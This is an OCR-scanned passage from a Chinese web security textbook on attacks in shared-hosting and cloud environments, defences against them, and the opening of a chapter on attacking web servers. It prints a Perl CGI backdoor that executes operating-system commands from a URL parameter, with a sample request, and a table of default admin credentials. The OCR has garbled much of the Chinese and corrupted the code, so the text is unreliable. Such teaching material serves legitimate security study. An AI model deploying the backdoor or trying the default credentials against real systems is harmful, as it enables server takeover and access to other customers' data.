序 ， 帮 助 客户 完成 这 些 任务 。 通 常 ， 通 过 一 个 VPN (Virtual Private 
Network， 虚 拟 专 用 网 络 ) 或 一 个 连接 ASP 基 础 架构 的 专用 连接 ， 就 可 
以 访问 这 些 应 用 程序 。 

根据 远程 访问 机 制 所 涵盖 的 范围 ， 攻 击 者 可 针对 共享 环境 实施 各 
种 不 同 的 攻击 。 


口 远程 访问 机 制 本 号 并 不 安全 。 例 如 ，FTP 协 议 未 加 密 ， 使 得 处 
在 适当 位 置 (例如 ， 在 客户 自己 的 ISP 内 ) 的 攻击 者 能 够 截获 登录 证 
书 。 访 问 机 制 中 还 可 能 包含 未 打 补 丁 的 软件 漏洞 或 配置 缺陷 ， 使 得 匿 
名 攻击 者 能 够 避 开 访问 机 制 ， 破 坏 客户 的 应 用 程序 和 数据 。 

口 远程 访问 机 制 许 可 的 访问 可 能 过 于 宽 汉 ， 或 者 未 能 对 客户 进行 
适当 的 隔离 。 例 如 ， 当 用 户 只 需要 文件 访问 时 ， 访 问 机 制 可 能 会 为 用 
户 提 供 一 个 命令 shell。 男 外 ， 访 问 机 制 可 能 并 没有 限制 客户 只 能 访问 
目 己 的 目录 ; 相反 ， 却 允许 他 们 更 新 其 他 客户 的 内 容 ， 或 者 访问 服务 
句 操 作 系 统 中 的 敏感 文件 。 

口 在 文件 系统 访问 方面 ， 同 样 的 注意 事项 也 适用 于 数据 库 。 访 问 
机 制 可 能 没有 对 数据 库 进 行 适当 的 隔离 ， 为 每 名 客户 提供 不 同 权限 的 
帐户。 直接 数据 库 连 接 可 能 使 用 标准 ODBC 之 类 的 非 加 密 渠 道 来 实 
现 。 

口 如 果 部 署 一 个 定制 应 用 程序 实现 远程 访问 (例如 ， 通 过 一 家 
ASP) ， 这 个 应 用 程序 必须 负责 控制 不 同 客 户 对 共享 应 用 程序 的 访 
问 。 管 理应 用 程序 中 存在 的 任何 漏洞 都 可 能 会 导致 恶意 客户 ， 甚 至 是 
匿名 用 户 破坏 其 他 客户 的 应 用 程序 ， 还 会 使 拥有 有 限 权 限 的 客户 能 够 
更 新 应 用 程序 的 皮肤 ， 从 而 提升 其 权限 ， 或 者 修改 应 用 程序 核心 功能 
组 件 ， 以 实现 他 们 的 目的 。 如 条 部 署 了 这 种 类 型 的 管理 应 用 程序 ， 那 
么 该 应 用 程序 中 存在 的 任何 漏洞 都 可 能 会 导致 针对 终端 用 户 访问 的 共 
享 应 用 程序 的 攻击 。 

2. 应 用 程序 间 的 攻击 

在 一 个 共 至 主机 环境 中 ， 不 同 的 客户 通常 需要 问 服 务 器 合法 上 传 
并 执行 © 这 会 导致 单 主机 应 用 程序 中 并 不 存在 的 问题 。 
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在 最 明显 的 攻击 中 ， 恶 意 客 户 可 能 会 上 传 攻击 服务 器 上 自身 或 其 他 
内 容 。 例 如 ， 下 面 的 Perl 脚本 在 服务 器 上 运行 一 个 远 
时 命令 工具 : 


#!/usr/bin/perl 

use strict; 

use CGI qw(:standard escapeHTML) ; 
print header, start_html(""); 


if (param({}) {my $command = param("cmd"); 
$command=* $command’ ; 


print "$command\n"; } 
else {print start_form(); textfield("command") ) ; } 
print end_html; 


从 因特网 上 访问 以 这 文 段 脚 本 ， 客 户 就 能 够 在 服务 右上 执行 任意 
操作 系统 Ju 命 


GET /scripts/backdoor.pl?cmd=whoami HTTP/1.1 
Host: wahh-maliciousapp.com 


HTTP/1.1 200 OK 

Date: Sun, 03 Jul 2011 19:16:38 GMT 

Server: Apache/2.0.59 

Connection: close 

Content-Type: text/html; charset=ISO-8859-1 


<!DOCTYPE html 

PUBLIC °-//#@3C//BTD XHTML 1.0 Transitional //EN" 

"http: //www.wi .org/TR/xhtm11/DTD/xhtml1-transitional .dtd"> 

shtml xnlns="http: //www.w3.org/1999/xhtml" lang="en-US" xml: lang="en-US"> 
<head> 
<title>Untitled Document</title> 
<meta http-equiv="Content-Type” content="text/html; charset=lso-8859-1" /> 
</head> 
<body> 
apache 
</body> 
</ħtml> 


由 于 恶意 客户 的 命令 以 Apache 用 户 的 号 份 执行 ， 这 很 可 能 使 得 该 
客户 能 够 访问 属于 共享 主机 服务 其 他 客户 的 脚本 和 数据 。 


ASP 管理 的 共 至 应 用 程序 中 也 存在 这 种 威胁 。 虽 然 核 心 应 用 程序 
功能 由 ASP 探 制 并 更 新 ， 但 个 体 用 户 还 是 能 够 以 某 种 确定 的 方式 修改 
这 项 功能 。 恶 意 客 户 可 以 在 他 们 控制 的 代码 中 引入 其 他 人 难以 察觉 的 
后 | ]， 从 而 攻破 共 至 应 用 程序 ， 访 问 其 他 客户 的 数据 。 


VY ”提示 后 门 脚本 可 以 用 大 多 数 Web 脚 本 语言 创建 。 欲 知 更 多 


以 其 他 语言 编写 的 脚本 实例 ， 请 访问 : http://net-square.com/ 
papers/one_way/one_way.html#4.0 ° 


@ 另 受 攻击 的 应 用 程序 间 的 攻击 

即使 共享 环境 中 的 所 有 客户 全 都 并 无 恶意 ， 且 仅 上 传经 过 环境 所 
有 者 确认 的 合法 脚本 ， 但 如 果 个 别 用 户 对 存在 于 应 用 程序 中 的 漏洞 并 
不 知情 ， 应 用 程序 之 间 的 攻击 仍 有 可 能 发 生 。 在 这 种 情况 下 ， 恶 意 用 
户 可 以 利用 某 个 应 用 程序 中 的 漏洞 攻破 该 应 用 程序 以 及 共享 环境 中 的 
所 有 其 他 应 用 程序 。 许 多 常见 的 漏洞 都 属于 这 种 类 型 ， 如 下 所 示 。 

口 攻 击 者 可 以 利用 某 个 应 用 程序 中 的 SQL 注入 漏洞 在 共享 数据 库 
中 执行 任意 SQL 查询 。 如 果 没 有 完全 隔离 访问 数据 库 的 不 同 客 户 ， 攻 
击 者 就 可 以 读 取 并 修改 所 有 应 用 程序 使 用 的 数据 。 

口 攻 击 者 可 以 利用 某 个 应 用 程序 中 的 路 径 壳 历 漏洞 读 取 或 写 入 服 
务 絮 文件 系统 中 的 任意 文件 ， 包 括 那 些 属 于 其 他 应 用 程序 的 文件 。 

口 攻击 者 可 以 采用 与 前 面 描述 的 恶意 客户 使 用 的 方法 类 似 的 方 
法 ， 利 用 某 个 应 用 程序 中 的 命令 注入 漏洞 攻破 服务 器 以 及 服务 器 上 运 
行 的 其 他 应 用 程序 。 

@ ASP 应 用 程序 组 件 间 的 攻击 

前 面 描述 的 各 种 攻击 全 部 可 能 会 在 共享 ASP 应 用 程序 中 发 生 。 由 
于 客户 可 以 按照 自己 的 需求 对 核心 应 用 程序 功能 进行 定制 ， 因 此 定制 
应 用 程序 的 用 户 可 以 利用 某 名 客户 引入 的 漏洞 攻击 主 共享 应 用 程序 ， 
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除 这 些 攻 击 以 外 ， 由 于 共享 应 用 程序 的 各 种 组 件 必须 彼此 交互 ， 
因而 恶意 客户 或 用 户 能 够 攻破 其 他 共享 的 应 用 程序 ， 如 下 所 示 。 

口 由 不 同 应 用 程序 生成 的 数据 通常 被 分 配 到 一 个 公共 的 位 置 ， 可 
以 被 共享 应 用 程序 中 拥有 较 高 权限 的 ASP 级 用 户 查看 。 这 意味 着 攻击 
者 可 以 利用 定制 应 用 程序 中 存在 的 XSS 漏 洞 攻破 共享 应 用 程序 。 例 


如 ， 如 有 果 攻 击 者 能 够 在 日 志文 件 条 目 、 文 付 记 录 或 者 个 人 联系 信息 中 
注入 JavaScript 代 码 ， 他 们 融 可 以 劫持 一 名 ASP 级 用 户 的 会 话 ， 从 而 访 
问 敏感 的 管理 功能 。 

口 ASP 通 币 使 用 一 个 共享 数据 库 保 存 所 有 客户 的 数据 。 应 用 程序 
与 数据 库 层面 是 否 对 数据 访问 实施 了 严格 的 隔离 ， 这 一 点 无 法 确定 。 
但 是 ,无论 是 哪 一 种 情况 ， 部 会 存在 一 些 共 至 组 件 ， 如 数据 库存 储 过 
程 ， 它 们 负责 处 理 属 于 多 名 客户 的 数据 。 恶 意 客 户 或 用 户 可 以 利用 这 
些 组 件 中 存在 的 有 缺陷 的 信任 关系 或 漏洞 访问 其 他 应 用 程序 中 的 数 
据 。 例 如 ， 一 个 定义 者 权限 共 至 存储 过 程 中 的 SQL 注 入 漏洞 可 能 会 导 
致 整个 共 至 数据 库 被 攻破 。 


渗透 测试 步骤 


(1) 检查 为 共享 环境 中 的 客户 提供 的 、 便 于 他 们 更 新 和 管理 
内 容 与 功能 的 访问 机 制 。 考 虑 以 下 问题 。 
口 远程 访问 机 制定 否 使 用 一 个 安全 的 协议 与 经 过 适当 强化 
的 基础 架构 ? 


Hi RS 原 : 
征 否 能 够 在 主机 环境 中 获得 一 个 交互 式 的 shell， 并 
执行 任意 命令 ? 
(2) 如 果 使 用 一 个 所 有 权 应 用 程序 ， 以 方便 客户 配置 和 定制 
共 主 环境 ， 考 虑 是 否 能 够 以 这 个 应 用 程序 为 攻击 目标 ， 攻 破 该 环境 


本 吴 及 其 中 运行 的 所 有 应 用 程序 。 

(3) 如 果 能 够 在 某 个 应 用 程序 中 执行 命令 、 注 入 SQL 脚本 或 访 
问 任意 文件 ， 仔 细 人 研究 ， 看 是 否 能 够 以 此 扩大 攻击 范围 ， 攻 了 破 其 他 
应 用 程序 。 

(4) 如 果 渗 透 测 试 员 正 在 攻击 一 个 使 用 ASP 主 机 的 应 用 程序 ， 
且 该 应 用 程序 由 许多 共享 与 定制 组 件 构 成 ， 确 定 其 中 的 任何 共享 组 
件 ， 如 日 志 机 制 、 管 理 功 能 以 及 数据 库 代 码 组 件 ， 和 党 试 利用 这 些 组 
件 攻 破 应 用 程序 的 共享 部 分 ， 进 而 攻破 其 他 应 用 程序 。 

(5) 如 果 所 有 共享 环境 使 用 一 个 常用 的 数据 库 ， 使 用 
NGSSquirrel 之 类 的 数据 库 扫 描 工 具 ， 对 数据 库 配 置 、 补 丁 级 别 、 表 
结构 以 及 许可 进行 全 面 审 查 。 数 据 库 安 全 模型 中 存在 的 任何 缺陷 都 
人 
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3. 攻击 云 

基本 上 ， 热 门 词汇 “ 云 ” 是 指 越 来 越 多 地 将 应 用 程序 、 服 务 器 、 数 
据 库 和 硬件 外 包 给 外 部 服务 提供 商 。 此 外 ， 它 也 指 目前 共享 托管 环境 
的 高 度 虚 拟 化 。 

从 广义 上 讲 ， 云 服务 是 指 提 供 API、 应 用 程序 或 用 于 客户 交互 的 
Web 界 面 的 基于 因特网 的 按 需 服务 。 通 常 ， 云 计算 提供 商会 存储 用 户 


数据 或 处 理 业 务 逻 辑 来 提供 相关 服务 。 从 终端 用 户 的 角度 看 ， 传 统 的 
桌面 应 用 程序 将 升级 为 基于 云 的 应 用 程序 ， 各 种 企业 可 能 会 用 按 需 服 
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在 迁移 到 云 服 务 的 过 程 中 ， 缺 乏 控制 是 一 个 经 常 被 提 及 的 安全 问 
题 。 与 传统 的 服务 右 或 保 面 软件 不 同 ， 用 户 没 有 办 法 提前 评估 特定 云 
服务 的 安全 性 ， 而 需要 将 管理 服务 和 数据 的 所 有 贡 任 交 给 第 三 方 。 对 
企业 而 言 ， 他 们 需要 将 更 多 控制 托付 给 某 个 环境 ， 而 该 环境 包含 的 风 
险 却 无 法 完全 定性 或 量化 。 由 于 基于 Web 的 平台 并 不 像 传统 的 客户 端 / 
服务 硕 可 下 载 的 产品 那样 经 过 严格 的 测试 ， 因 此 ， 在 文 持 云 服务 的 
Web 应 用 程序 中 发 现 的 漏洞 也 往往 不 为 人 们 所 了 解 。 

这 种 对 缺乏 控制 的 担心 ， 与 当前 企业 在 选择 托管 服务 提供 商 、 或 
用 户 在 选择 Web 邮 件 服务 商 时 的 担忧 类 似 。 但 和 是， 仅仅 这 种 担忧 并 不 
能 反映 云 计 算 珊 来 的 日 花 严 重 的 安全 风险 。 攻 破 一 个 传统 的 Web 应 用 
程序 可 能 会 影响 到 成 千 上 万 名 个 体 用 户 ， 但 攻破 云 服 务 却 可 能 影响 到 
成 千 上 万 名 云 订阅 用 户 及 其 用 户 群 体 。 虽 然 存 在 缺陷 的 访问 控制 会 使 
攻击 者 能 够 未 授权 访问 工作 流程 应 用 程序 中 的 敏感 文档 ， 但 在 云 目 助 
服务 应 用 程序 中 ， 这 种 缺陷 可 能 会 导致 攻击 者 能 够 未 授权 访问 服务 天 
或 服务 右 集 群 。 利 用 管理 后 端 门户 云 服务 中 的 同一 漏洞 ， 攻 击 者 甚至 
能 够 访问 整个 企业 基础 架构 。 

@ Web 应 用 程序 角度 的 云 安 全 

由 于 定义 不 明确 ， 每 个 云 服 务 提 供 商 的 实施 方式 各 不 相同 ， 因 此 
并 没有 适用 于 所 有 云 体系 架构 的 漏洞 列表 。 但 是 ， 我 们 仍然 可 以 确定 
一 些 专门 针对 云 计 算 体系 以 构 的 主要 漏洞 区 域 。 


T 注解 关于 云 安全 ， 人 们 经 常 提 到 的 一 种 防御 机 制 是 静态 
或 动态 数据 加 密 。 但 是 ， 在 这 种 情况 下 ， 加 密 只 能 提供 最 低 限 度 的 


保护 。 如 17.1 节 所 述 ， 如 果 攻 击 者 避 开 应 用 程序 的 身份 验证 或 授权 
和 
可 解密 功能 。 


@ 克隆 系统 

在 使 用 炉 生 成 随机 数字 时 ， 许 多 应 用 程序 依赖 操作 系统 的 功能 
执行 这 一 操作 。 常 用 的 粹 源 大 多 与 系统 本 身 的 功能 有 关 ， 如 系统 正常 
运行 时 间 ， 或 有 关系 统 硬件 的 信息 。 如 果 系 统 被 克隆 ， 拥 有 其 中 一 个 


克隆 系统 的 攻击 者 就 可 以 确定 用 于 生成 随机 数字 的 炉 源 ， 这 些 信息 叉 
可 用 于 更 准确 地 预测 随机 数字 发 生 器 的 状态 。 

@ 将 管理 工具 迁移 到 云 中 

用 于 配置 和 监视 服务 器 的 界面 是 企业 云 计算 服务 的 核心 应 用 。 对 
用 户 而 言 ， 该 界面 是 一 个 上 自助 环境 ， 通 弟 是 最 初 用 于 内 部 服务 髓 管理 
的 工具 的 web 版本。 以 前 连接 到 网 络 的 独立 工具 往往 缺乏 可 靠 的 会 话 
管理 和 访问 控制 机 制 ， 在 没有 预先 采用 基于 角色 的 隔离 的 情况 下 更 是 
如 此 。 笔 者 曾 发 现 一 些 将 令 牌 或 GUID 用 于 服务 器 访问 的 情况 。 在 其 他 
情况 下 ， 应 用 程序 仅仅 通过 序列 化 接口 来 调用 任何 管理 方法 。 

o 功能 优先 的 方法 

和 大 多 数 新 技术 一 样 ， 云 服务 提供 商 采 用 功能 优 移 的 方法 来 吸引 
新 用 户 。 从 企业 的 角度 来 看 ， 云 环境 几乎 总 是 通过 上 自助 Web 应 用 程序 
管理 。 用 户 获得 一 系列 用 户 友好 的 方法 ， 并 通过 这 些 方法 来 访问 数 
据 。 云 服务 通常 并 不 提供 功能 “人 退出” 机制 。 

@ 其 于 令 牌 的 访问 

用 户 需 要 定期 调用 大 量 云 资源 ， 为 此 ， 用 户 需 要 在 客户 端 上 存储 
一 个 永久 身份 验证 令 牌 ， 以 免 输入 密码 ， 并 用 于 标识 设备 (相对 于 用 
户 ) 。 如 果 攻 击 者 能 够 访问 该 令 牌 ， 束 可 以 借 此 访问 用 户 的 云 资源 。 

@ _ Web 存储 

Web 存 储 是 云 计 算 吸 引 终端 用 户 的 优势 之 一 。 为 发 挥 歼 率 ，Web 
存储 必须 文 持 某 种 标准 的 浏览 需 或 浏览 器 扩展 、 一 系列 技术 和 HTTP 扩 
展 (如 WebDAV) ， 并 且 通 常 需要 文 持 存 入 缓存 或 基于 令 牌 的 证 书 
(如 上 所 述 ) 。 

此 外 ， 域 上 的 web 服务 万 通常 可 以 通过 因特网 访问 。 如 果 某 个 用 
户 可 以 上 传 HTML 文 件 并 诱 使 其 他 用 户 访问 其 上 传 的 文件 ， 他 残 可 以 
攻破 这 些 使 用 同一 服务 的 用 户 。 与 此 类 似 ， 攻 击 者 可 以 利用 Java 同 源 
策略 并 上 传 一 个 JAR 文 件 ， 从 而 在 该 文件 被 因特网 上 的 其 他 位 置 调用 
时 实现 完全 的 双向 交互 。 


17.2.4 H JES: 
由 于 使 用 相同 工具 的 客户 可 能 怀 有 恶意 企图 ， 以 及 不 知情 的 客户 


可 能 无 意 中 在 环境 中 引入 漏洞 ， 因 此 ， 共 至 环境 给 应 用 程序 安全 市 来 
了 新 的 威胁 。 为 解决 这 种 双重 威胁 ， 设 计 共 至 环境 时 必须 仔细 处 理 客 


和 
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1. 保障 客户 访问 的 安全 

无 论 问 客 户 提供 何 种 机 制 来 帮助 他 们 维护 自己 控制 的 内 容 ， 都 应 
防止 这 种 机 制 被 第 三 方 和 恶意 客户 未 授权 访问 。 

口 远 程 访 问 机 制 应 实施 严格 的 喘 份 确认 ， 使 用 难以 窃听 的 加 密 技 
术 ， 并 进行 充分 的 安全 强化 。 

口 仅 准 了 予 个 体 用 户 最 低 的 访问 权限 。 例 如 ， 如 果 一 名 客户 需要 问 
一 人 台 虚 拟 主机 服务 器 上 传 脚本 ， 就 应 仅 同 他 分 配 读 取 与 写 入 他 自己 的 
文档 根 目录 的 访问 权限 。 如 果 需 要 访问 一 个 共享 数据 库 ， 就 应 使 用 一 
个 无 法 访问 属于 其 他 客户 的 数据 或 其 他 组 件 的 低 权 限 账户 进行 访问 。 

口 如 果 使 用 一 个 定制 的 应 用 程序 提供 客户 访问 ， 该 应 用 程序 必须 
Hn E 
行 测试 。 

2. 隔离 客户 功能 

不 能 信任 共享 环境 中 的 客户 ， 认 为 他 们 仅 建立 没有 漏洞 的 无 害 功 
能 。 因 此 ， 稳 定 可 靠 的 解决 方案 是 应 使 用 本 章 前 半 部 分 描述 的 架构 控 
制 来 保护 共享 环境 及 其 客户 ， 避 人 免 受 到 通过 不 当 内 容 实 施 的 攻击 。 这 
要 求 隅 离 给予 每 名 客户 的 功能 ， 确 保 将 任何 有 意 或 无 意 攻 击 的 影响 限 
制 在 局 部 ， 使 其 不 会 伤害 其 他 客户 。 
口 每 名 客户 的 应 用 程序 应 使 用 一 个 独立 的 操作 系统 账户 访问 文件 
系统 ， 该 账户 仅 拥有 读 取 与 写 入 应 用 程序 文件 路 径 的 权限 。 
口 强大 系统 功能 与 命令 的 访问 权限 应 仅 限 于 操作 系统 等 级 ， 且 应 
只 分 配 所 需 的 最 低 权 限 。 
口 应 在 任何 共享 数据 库 中 实施 相同 的 保护 措施 。 应 为 每 名 客户 使 
用 一 个 单独 的 数据 库 实 例 ， 仅 向 客户 分 配 低 权 限 的 账户 ， 只 允许 他 们 
访问 自己 的 数据 。 


T 注解 许多 基于 LAMP 模 型 的 共享 主机 环境 依靠 PHP 安 全 模 


式 来 限制 某 个 恶意 或 易 受 攻击 脚本 的 洪 在 影响 。 这 种 模式 防止 PHP 
脚本 访问 某 些 强 大 的 PHP 范 数 ， 将 对 其 他 函数 的 操作 实施 限制 (请 
参阅 第 19 章 了 解 相 关内 容 ) 。 然 而 ， 这 些 限制 并 非 完 全 有 效 ， 而 且 
非常 容易 避 开 。 虽 然 安 全 模式 能 够 提供 有 用 的 防御 ， 但 由 于 它 需 要 
操作 系统 信任 应 用 程序 层 ， 以 控制 它 的 操作 ， 因 此 ， 从 染 构 上 讲 ， 


在 这 里 控制 恶意 或 易 受 攻击 的 应 用 程序 造成 的 影响 并 不 合适 。 由 于 
这 个 及 其 他 原因 ，PHP 6 以 后 的 版 本 删除 了 安全 模式 。 


Vo fem ”如果 能 够 在 服务 器 上 执行 任意 PHP 命 令 ， 可 使 用 


phpinfo0 命 令 返 回 PHP 环 境 的 配置 信息 。 可 以 检查 这 些 信息 ， 了 解 
PHP 是 否 激活 安全 模式 ， 以 及 其 他 配置 选项 如 何 影响 执行 的 操作 。 
请 参阅 第 19 革 了 解 更 多 详情 。 


3. 隔离 共享 应 用 程序 中 的 组 件 

在 ASP 环 境 中 ， 应 用 程序 包含 各 种 共 译 与 定制 的 组 件 ， 这 时 应 在 
各 方 控制 的 组 件 之 间 实 施 信任 边界 。 如 采 一 个 数据 库存 储 过 程 之 类 的 
共 至 组 件 接收 从 某 一 名 客户 的 定制 组 件 发 出 的 数据 ， 那 么 就 不 应 信任 
这 些 数据 ， 束 好 像 它 们 是 由 终端 用 户 送出 的 一 样 。 每 个 组 件 都 应 对 它 
的 信任 边界 以 外 的 相 邻 组 件 进行 闫 格 的 安全 测试 ， 确 定 其 中 存在 的 、 
攻击 者 可 以 利用 易 受 攻击 的 组 件 或 恶意 组 件 攻 破 其 他 应 用 程序 的 漏 
洞 。 应 特别 注意 共 孕 日志 与 管理 功能 。 


17.3 ”小结 


Web 应 用 程序 以 构 中 实施 的 安全 控制 可 帮助 应 用 程序 所 有 者 显著 
改善 他 们 部 署 的 应 用 程序 的 安全 状态 。 但 是 ， 如 果 应 用 程序 架构 中 存 
在 缺陷 与 碑 忽 ， 攻 击 者 束 可 以 利用 它们 进一步 扩大 攻击 范围 ， 通 过 一 
个 组 件 攻 击 男 一 个 组 件 ， 最 终 攻 破 整 个 应 用 程序 。 

另 一 方面 ， 共 享 主 机 与 基于 ASP 的 环境 也 引发 了 一 系列 新 的 、 难 
以 解决 的 安全 问题 ， 包 括 单 主机 应 用 程序 中 并 不 存在 的 信任 边界 。 如 
果 攻 击 者 想 要 攻击 共 至 环境 中 的 一 个 应 用 程序 ， 他 束 应 该 集中 精力 对 
共 至 环境 实施 攻击 ， 确 定 是 否 可 以 通过 其 中 的 某 个 应 用 程序 攻破 这 个 
环境 ， 或 者 利用 一 个 易 受 攻击 的 应 用 程序 攻击 其 他 应 用 程序 。 


17.4 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh ° 

(1) 假设 受 攻击 的 应 用 程序 使 用 两 台 不 同 的 服务 器 : 一 台 应 用 程 
序 服务 器 和 一 台数 据 库 服务 器 。 已 经 发 现 一 个 漏洞 ， 可 以 在 应 用 程序 
服务 硕 上 执行 任意 操作 系统 命令 。 是 否 可 以 利用 这 个 漏洞 获取 保存 在 
数据 库 中 的 敏感 应 用 程序 数据 ? 

(2) 在 另外 一 种 情形 中 发 现 了 一 个 SQL 注入 漏洞 ， 可 以 利用 它 在 
数据 库 服 务 器 上 执行 任意 操作 系统 命令 。 是 否 可 以 利用 这 个 漏洞 攻 破 
应 用 程序 服务 器 ? 例如 ， 是 否 可 以 修改 保存 在 应 用 程序 服务 器 中 的 应 
用 程序 脚本 以 及 辐 用 户 返 回 的 内 容 ? 

(3) 在 攻击 共享 环境 中 的 一 个 Web 应 用 程序 时 ， 与 ISP 签 订 合 约 
后 ， 在 所 针对 的 同一 人 台 服 务 硕 上 获得 了 一 些 Web 空 间 ， 可 以 癌 其 中 上 
传 PHP 脚 本 。 

是 否 可 以 利用 这 种 情况 攻破 目标 应 用 程序 ? 

(4) Linux、Apache、MySQL 与 PHP 等 架构 组 件 常安 装 在 同一 台 
物理 服务 右上 “。 为 何 这 样 做 会 削弱 应 用 程序 架构 的 安全 状况 ? 

(5) 如 何 找到 证 据 来 证 明 所 攻击 的 应 用 程序 由 某 个 应 用 程序 服务 
提供 商 托 管 ? 


第 18 章 
攻击 Web 服 务 器 


与 任何 其 他 应 用 程序 一 样 ，Web 应 用 程序 也 依赖 于 支持 它 的 其 他 
技术 栈 (technology stack) ， 包 括 Web 服 务 器 、 操 作 系 统 与 网 络 基础 
架构 。 这 些 组 件 中 的 任何 一 个 都 可 能 成 为 攻击 者 的 目标 ， 应 用 程序 依 
赖 的 技术 往往 可 使 攻击 者 能 够 完全 攻破 整个 应 用 程序 。 

本 书 主要 讨论 渗透 测试 员 如 何 攻击 Web 应 用 程序 ， 因 此 大 多 数 上 
述 类 型 的 攻击 不 在 本 书 的 讨论 范围 之 内 ， 但 针对 Web 服 务 器 层 的 攻击 
以 及 相关 应 用 程序 层 的 防御 是 个 例外 。 内 联防 御 通 常用 于 保障 Web 应 
用 程序 的 安全 及 识别 攻击 。 避 开 这 些 防御 是 攻破 应 用 程序 的 关键 步 
WE o 

迄今 为 止 ， 我 们 并 未 对 Web 服 务 器 与 应 用 程序 服务 器 进行 区 分 ， 
因为 各 种 攻击 主要 针对 的 是 应 用 程序 的 功能 ， 无 论 应 用 程序 以 何 种 方 
式 提供 这 些 功能 。 实 际 上 ， 大 部 分 表示 层 、 与 后 端 组 件 的 通信 ， 以 及 
核心 安全 框架 都 可 能 由 应 用 程序 容器 管理 。 这 就 进一步 扩大 了 攻击 范 
围 。 很 明显 ， 如 果实 现 这 些 框架 的 技术 存在 任何 漏洞 ， 可 用 于 直接 攻 
破 应 用 程序 ， 这 些 漏洞 将 会 引起 攻击 者 的 关注 。 

本 章 主 要 讨论 如 何 利用 Web 服 务 器 中 存在 的 漏洞 攻击 其 上 运行 的 
Web 应 用 程序 。 当 攻击 Web 服 务 器 时 ， 渗 透 测 试 员 可 以 利用 的 漏洞 分 
为 两 大 类 :服务 器 配置 缺陷 和 应 用 程序 服务 器 软件 中 的 安全 漏洞 。 相 
关 漏 洞 的 列表 可 能 并 不 全 面 ， 因 为 这 类 软件 总 是 在 不 断 变 化 ， 但 本 音 
介绍 的 漏洞 将 说 明 各 种 应 用 程序 在 执行 自己 的 本 地 扩展 、 模 块 或 
API， 或 访问 外 部 功能 时 可 能 遇 到 的 常见 危险 。 

在 本 章 中 ， 我 们 还 将 分 析 Web 应 用 程序 防火 墙 ， 介 绍 其 优 缺 点 ， 
并 详细 说 明 如 何 突破 这 些 防火 墙 以 实施 攻击 的 常用 方法 。 


18.1 Web 置 


即使 最 简单 的 Web 服 务 右 也 带 有 大 量 控制 其 行为 的 配置 选项 。 以 
前 发 布 的 许多 服务 器 售 有 不 安全 的 默认 选项 ， 如 果 不 对 它们 进行 强 
化 ， 可 能 会 使 攻击 者 有 机 可 乘 。 


18.1.1 认证 书 


许多 Web 服 务 器 包含 可 被 公众 访问 的 管理 接口 。 这 些 接口 可 能 位 
于 Web 根 目录 的 某 个 特定 位 置 ， 或 者 在 8080 或 8443 端 口上 运行 。 通 
常 ， 管 理 接 口 使 用 众所周知 的 默认 证 书 ， 这 些 证 书 在 安装 时 不 需要 进 
行 修 改 。 

一 些 最 常见 的 管理 接口 的 默认 证 书 如 表 18-1 所 示 。 


表 18-1 一 些 常见 管理 接口 的 默认 证 书 
用 户 名 EW 


Apache Tomcat admin (无 ) 
tomcat tomcat 
root root 
Sun JavaServer admin admin 
Netscape Enterprise Server admin admin 
Compaq Insight Manager administrator administrator 
anonymous (无 ) 
user user 
operator operator 
user public 


Zeus admin (T) 


除 Web 服 务 器 上 的 管理 接口 外 ， 大 量 设备 (如 交换 机 、 打 印 机 与 
无 线 接 入 点 ) 还 使 用 禁止 修改 其 默认 证 书 的 web 接口。 以 下 资源 列 出 
了 大 量 技术 的 默认 证 书 : 

口 www.cirt.net/passwords 

Dwww.phenoelit-us.org/dpl/dpl.html 


渗透 测试 步骤 


(1) 检查 应 用 程序 解析 过 程 中 得 到 的 结果 ， 确 定 应 用 程序 使 
用 的 、 可 能 包含 可 访问 的 管理 接口 的 Web 服 务 器 与 其 他 技术 。 
(2) Webs awit A Fat, PARE TESTA] E H pn FB 


的 不 同 端口 上 运行 的 所 有 管理 接口 。 
(3) 对 于 确定 的 接口 ， 查 阅 制 造 商 文档 资料 与 常用 密码 表 ， 
获得 默认 证 书 。 使 用 Metasploit 的 内 置 数据 库 扫 描 服 务 器 。 
如 果 默 认证 书 无 效 ， 使 用 第 6 章 描述 的 技巧 尝试 猜测 有 效 
TEE 。 
(5) 如 果 能 够 访问 一 个 管理 接口 ， 审 查 可 用 的 功能 ， 确 定 
人 否 可 以 利用 这 项 功能 进一步 攻破 主机 与 主 应 用 程序 。 


18.1.2 默认 内 容 


大 多 数 Web 服 务 器 中 含有 可 用 于 攻击 服务 器 自身 或 主 目标 应 用 程 
序 的 默认 内 容 与 功能 。 以 下 是 一 些 可 能 有 用 的 默认 内 容 。 

口 为 管理 员 设 计 的 调试 与 测试 功能 。 

口 用 于 演示 某 些 常见 任务 的 样本 功能 。 

口 本 应 禁止 公众 访问 ， 但 无 意中人 允许 公众 访问 的 强大 功能 。 

口 包含 仅 在 安装 时 有 用 的 信息 的 Web 服 务 器 手册 。 

1. 调试 功能 

通常 ， 为 方便 管理 员 进 行 诊断 而 设计 的 功能 对 攻击 者 极其 有 用 ， 
因为 其 中 包含 与 服务 右 和 它 上 面 运行 的 应 用 程序 的 配置 及 与 运行 状态 
有 关 的 重要 信息 。 

图 18-1 为 默认 页 面 phpinfo.php， 许 多 Apache 版 本 中 都 含有 该 页 
面 。 这 个 页 面 运行 PHP 函 数 phpinfo0 并 返回 其 结果 。 页 面 中 包含 大 量 
与 PHP 环 境 、 配 置 设 置 、Web 服 务 絮 模块 和 文件 路 人 径 有 天 的 信息 。 


(etopnpvapache2icont dmys guni etopnpSvapache2'cont cimysqilani, etoonps/apacne2cont apao ini, ECphnp5lapsche2 


[PHP API |20041225 
PHP 20080813 


图 18-1 默认 页 面 phpinfo.php 


2. 样本 功能 

许多 服务 器 默认 包含 各 种 样本 脚本 与 页 面 ， 其 目的 在 于 演示 某 些 
Web 服 务 右 功能 与 API 的 用 法 。 通 常 ， 这 些 样本 功能 并 无 害处 ， 也 不 会 
R 。 但 实际 上 ， 基 于 以 下 两 点 原因 ， 事 实 并 非 

HHE ° 

口 许 多 样本 脚本 包含 安全 漏洞 ， 可 被 攻击 者 用 于 执行 脚本 作者 不 
希望 执行 的 操作 。 

口 许多 样本 脚本 甚至 执行 可 被 攻击 者 直接 利用 的 功能 。 

第 一 个 问题 的 示例 为 Jetty 版 本 7.0.0 中 包含 的 Dump Servlet。 此 
Servlet 可 以 通过 /test/jjsp/dump.jsp 之 类 的 URL 访 问 。 一 旦 被 访问 ， 它 会 
打 FhJetty 安 装 及 当前 请 求 的 各 种 详情 ， 包 括 请 求 查 询 字 符 串 。 因 此 ， 
